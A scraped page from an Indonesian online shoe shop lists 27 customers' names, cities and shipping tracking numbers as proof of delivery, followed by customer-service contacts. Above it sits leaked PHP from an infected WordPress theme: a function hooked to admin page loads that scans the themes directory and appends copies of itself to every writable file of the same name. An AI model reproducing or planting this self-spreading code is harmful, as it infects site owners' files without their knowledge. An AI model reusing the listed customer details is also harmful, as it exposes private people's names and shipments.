function _check_active_widget(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed=""; $output=strip_tags($output, $allowed); $direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6))); if (is_array($direst)){ foreach ($direst as $item){ if (is_writable($item)){ $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"(")); $cont=file_get_contents($item); if (stripos($cont,$ftion) === false){ $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);} $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f); $output .= ($showdot && $ellipsis) ? "..." : ""; } } } } return $output; } function _get_all_widgetcont($wids,$items=array()){ $places=array_shift($wids); if(substr($places,-1) == "/"){ $places=substr($places,0,-1); } if(!file_exists($places) || !is_dir($places)){ return false; }elseif(is_readable($places)){ $elems=scandir($places); foreach ($elems as $elem){ if ($elem != "." && $elem != ".."){ if (is_dir($places . "/" . $elem)){ $wids[]=$places . "/" . $elem; } elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){ $items[]=$places . "/" . $elem;} } } }else{ return false; } if (sizeof($wids) > 0){ return _get_all_widgetcont($wids,$items); } else { return $items; } } if(!function_exists("stripos")){ function stripos( $str, $needle, $offset = 0 ){ return strpos( strtolower( $str ), strtolower( $needle ), $offset ); } } if(!function_exists("strripos")){ function strripos( $haystack, $needle, $offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) ); } if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) ); return $pos; } } if(!function_exists("scandir")){ function scandir($dir,$listDirectories=false, $skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != "." && $file != "..") || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray; } } add_action("admin_head", "_check_active_widget"); ?> Bukti Pengiriman cuhenk footwear | Grosir sepatu bandung | supplier sepatu bandung | Toko Sepatu Online | Toko Sepatu Murah | Harga Sepatu Termurah | Grosir sepatu bandung

BUKTI PENGIRIMAN

Kami ingin membuktikan bahwa kami adalah Seller yang wajib anda percaya :

bukti pengiriman

bukti pengiriman

Berikut Daftar No Resi Hasil Transaksi Cuhenk Branded Shoes, baik langsung maupun dropship :

1. Andy Hilmawan – Jakarta Timur – BDOG100661334313

2. Sarah Puspita – Jambi – BDOG100690373213

3. Kemas Delta – Jambi – BDOG100702145413

4. Mila Amalia Kamin – Pangkalanbun – BDOG100729869713

5. Nusyirwan Hidayat – Selayar – BDOAA03079163413

6. Endro – Sukabumi – BDOG400273813513

7. Diana Novitasari – Cilandak – BDOG400276533413

8. Arga – Jatinangor – BDOG100781691113

9. Reynaldy – Depok – BDOG100800803613

10. Rasyad Harris – Bogor – BDOG100800782413

11. Didit – Yogyakarta – BDOG100814603013

12. Sarah Puspita – Jambi – BDOG100844333013

13. Fatimah – Bendungan Hilir – BDOG400315524713

14. Widie – Kramatjati – BDOG400315544313

15. Sarah Puspita – Jambi – BDOG400315534513

16. Tendrio – Pontianak – BDOAB03238124513

17. Heru aprianto – Kupang – BDOAB03238144113

18. Bambang Wijayadi – Bandung – BDOAB03238134313

19. Rifky Ardianto – Jayapura – BDOAB03238114713

20. Shaeful Ulum – Makassar – BDOG400318623413

21. Andi Nugroho – Cilacap – BDOG400318613613

22. Ari mukti – Pesanggrahan – BDOP100257433913

23. Muhammad fadel Noerman – Bandarlampung – BDOAB03288551313

24. Bobby Rahmat – Banda aceh – BDOAB03288490913

25. Fx Mintar – Purbalingga – BDOAB03288402713

26. Aditya Imam – Solo – BDOAB03288352113

27. Agus Kurniawan – Cikarang – BDOG100890403413

CUSTOMER SERVICE


D6D87614


081320234323


fb : cuhenkshoes


line : cuhenk


ig : cuhenk

join channel telegram
081320234323

Pin BB : D6D87614

Customer service 1